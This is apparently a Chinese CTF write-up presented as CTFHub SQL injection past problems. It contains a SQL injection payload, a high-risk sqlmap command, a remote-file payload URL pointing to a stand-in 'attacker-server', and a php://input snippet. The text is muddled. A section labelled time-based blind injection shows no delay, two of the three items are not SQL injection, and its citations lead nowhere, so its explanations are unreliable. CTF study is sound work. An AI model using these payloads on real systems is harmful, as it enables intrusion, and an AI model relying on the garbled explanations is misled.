ctfhub 历年真题sql注入2

### CTFHub 平台上的历年 SQL 注入真题及解析 #### 背景介绍 CTF（Capture The Flag）竞赛中的 Web 安全题目通常涉及多种攻击向量，其中 SQL 注入是最常见的挑战之一。通过分析历史真题及其解决方案，可以更好地理解漏洞的本质以及防御方法。 --- #### 题目一：基于布尔条件的时间盲注 此类型的题目主要考察选手对时间延迟型 SQL 注入的理解[^2]。 目标 URL 参数如下： ``` ?id=if(1=1,1,(select table_name from information_schema.tables)) ``` 当 `?id` 的值被设置为上述 payload 时，服务器会根据条件执行不同的逻辑路径。如果条件成立，则返回正常页面；否则触发子查询并可能引发错误或超时行为。具体实现可以通过工具如 sqlmap 自动化完成测试过程： ```bash sqlmap -u "http://example.com/?id=1" --time-sec=5 --risk=3 --level=5 --technique=T ``` 以上命令行配置用于探测是否存在基于时间的盲注漏洞，并尝试提取数据库元数据信息。 --- #### 题目二：文件读取与字符串匹配结合 某些场景下需要综合利用多个输入点来绕过验证机制[^3]。例如给定 PHP 脚本片段： ```php if (isset($_GET['text']) && file_get_contents($_GET['text'], 'r') === "welcome to the zjctf") { echo "Correct!"; } else { die("Incorrect!"); } ``` 为了成功提交有效载荷，需构造满足以下约束关系的一组参数组合： 1. **Text Parameter**: 提供可访问的目标资源链接地址； 2. **File Content Validation**: 确保远程加载的内容正好等于预期字符串 `"welcome to the zjctf"`。 一种可行 Payload 设计方案如下所示： ``` http://target-site/vuln.php?text=http://attacker-server/payload.txt&file=&pwd= ``` 这里假设攻击者已经提前准备好了一个托管于外部主机上的静态文本文件 `/payload.txt` ，其内容恰好符合校验标准。 --- #### 题目三：PHP 协议流滥用案例 除了传统的 GET/POST 请求方式之外，在特定条件下还可以借助伪协议实现更复杂的交互操作模式[^1] 。比如利用 `php://input` 来动态生成 POST 数据体部分或者模拟表单上传动作等等。 下面给出一段简单的演示代码用来接收来自客户端发送过来的信息并通过回显确认接收到的数据包详情情况: ```php <?php echo file_get_contents('php://input'); ?> ``` 此时如果我们发起带有自定义 body 的 HTTP 请求就可以看到对应的响应结果了. --- ### 总结说明 通过对这些经典实例的学习可以帮助我们积累实战经验的同时也提醒开发者注意潜在的安全隐患所在之处从而采取适当措施加以防范加固系统整体安全性水平。